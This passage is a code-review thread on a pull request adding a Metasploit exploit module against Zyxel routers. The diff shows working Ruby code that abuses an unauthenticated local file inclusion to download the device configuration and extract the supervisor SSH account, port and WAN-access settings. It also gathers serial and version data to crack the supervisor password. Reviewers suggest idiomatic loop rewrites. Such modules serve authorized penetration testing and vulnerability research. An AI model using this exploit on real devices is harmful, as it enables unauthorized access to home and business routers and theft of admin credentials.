modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb

```diff
@@ -0,0 +1,305 @@
+              },
+              'Payload' => {
+                'Compat' => {
+                  'PayloadType' => 'ssh_interact'
+                }
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false,
+          'WfsDelay' => 5
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_advanced_options(
+      [
+        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+      ]
+    )
+  end
+
+  def get_configuration
+    # Get the device configuration by exploiting the LFI vulnerability
+    return send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/Export_Log?/data/zcfg_config.json')
+    })
+  end
+
+  def process_configuration(res)
+    # Initiate the hash_config
+    hash_config = { 'hardware' => nil, 'software' => nil, 'serial' => nil, 'ssh_user' => nil, 'ssh_port' => nil, 'ssh_wan_access' => nil, 'ssh_service_enabled' => nil }
+    # Parse the device configuration json file
+    begin
+      res_json = res.get_json_document
+    rescue JSON::ParserError => e
+      print_error(Failure::Unknown, "Unable to parse the JSON response. Error: #{e}")
+      return hash_config
+    end
+    if res_json.nil? || res_json.blank?
+      print_error(Failure::NotFound, 'No device configuration file found.')
+      return hash_config
+    end
+    # process json output and retrieve information about supervisor user, ssh port and ssh WAN service status
+    # Also grab hardware and software version including the serial number to crack weak AES encrypted password of user supervisor
+
+    hash_config['hardware'] = res_json['DeviceInfo']['HardwareVersion'] if !res_json.dig('DeviceInfo', 'HardwareVersion').nil?
+    hash_config['software'] = res_json['DeviceInfo']['SoftwareVersion'] if !res_json.dig('DeviceInfo', 'SoftwareVersion').nil?
+    hash_config['serial'] = res_json['DeviceInfo']['SerialNumber'] if !res_json.dig('DeviceInfo', 'SerialNumber').nil?
+
+    if !res_json.dig('X_ZYXEL_LoginCfg', 'LogGp').nil?
+      res_json['X_ZYXEL_LoginCfg']['LogGp'].map do |login|
+        if !login['Account'].nil? && hash_config['ssh_user'] != 'supervisor'
+          login['Account'].map do |account|
+            if account['Username'] == 'supervisor'
+              hash_config['ssh_user'] = account['Username']
+              break
+            end
+          end
+        else
+          break
+        end
+      end
+    end
+    if !res_json.dig('X_ZYXEL_RemoteManagement', 'Service').nil?
+      res_json['X_ZYXEL_RemoteManagement']['Service'].map do |service|
```

Comment:
Same here with use of `map`. Should be `each` ?

```suggestion
      res_json['X_ZYXEL_RemoteManagement']['Service'].each do |service|
```

Also given that the the main body of the loop breaks the loop the first time the guard is bypassed, and the guard is a simple string comparison, this could be simplified with `accept`.

Something like this:

```ruby
    remote_service = res_json.dig('X_ZYXEL_RemoteManagement', 'Service')
    unless remote_service.nil?
      service = remote_service.accept {|s| s['Name'] == 'SSH'}.first
      hash_config['ssh_port'] = service['Port']
      hash_config['ssh_wan_access'] = service['Mode']
      hash_config['ssh_service_enabled'] = service['Enable']
    end
```

Reply:
Neat! Thank you :smile:

Reply:
Indeed neat and updated. Used `select` instead of `accept` because of `NoMethod` error and added extra check ifv SSH service does not exist in config file. See https://github.com/rapid7/metasploit-framework/pull/17881/commits/de9cd59ea5bd3348a4dcdc6eb0f0c398cd89d9a7